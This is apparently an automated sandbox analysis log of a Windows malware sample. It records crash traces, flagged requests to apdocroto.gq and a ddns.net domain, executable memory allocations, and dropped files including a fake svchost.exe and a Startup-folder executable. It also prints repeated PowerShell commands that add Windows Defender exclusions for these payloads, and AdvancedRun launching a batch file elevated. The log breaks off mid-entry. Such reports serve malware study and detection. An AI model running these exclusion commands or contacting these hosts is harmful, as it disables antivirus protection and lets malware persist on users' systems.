registers.edx: 38146600
registers.ebx: 4317248
registers.esi: 38146600
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4a8150
0x4a7639
0x4a71c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x4a0234
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 9b 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4a81ab
registers.esp: 4316916
registers.edi: 4316936
registers.eax: 0
registers.ebp: 4316948
registers.edx: 50151600
registers.ebx: 4317248
registers.esi: 50151600
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4ad85e
0x4acdb7
0x4a83df
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x4a0234
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 8b 01 eb 3e 8d 55 e0 0f b6 01 88 02 0f b6 41 01
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol: mscorlib+0x324f62
exception.address: 0x6ef04f62
registers.esp: 4319220
registers.edi: 4319244
registers.eax: 0
registers.ebp: 4319256
registers.edx: 0
registers.ebx: 50508884
registers.esi: 4194364
registers.ecx: 4194364
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html
suspicious_features GET method with no useragent header suspicious_request GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html
domain dontreachme3.ddns.net
request GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html
request GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 996
region_size: 720896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00590000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00600000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fba1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fba2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00462000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00595000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0059b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00486000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0048a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00487000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0048b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff20000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c0073
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c007b
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c007f
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c0083
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c0089
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c008f
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c0093
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c009b
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c009f
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00a7
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00af
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00bf
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00c3
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00c7
process_handle: 0xffffffff
3221225541 0
file C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe
file C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe
file C:\Users\test22\AppData\Roaming\Install\Host.exe
file C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat
file C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
file C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat
file C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
cmdline cmd.exe /c timeout 1
cmdline "C:\Windows\System32\cmd.exe" /c timeout 1
file C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
file C:\Users\test22\AppData\Roaming\Install\Host.exe
file C:\Users\test22\AppData\Roaming\Install\Host.exe
file C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe
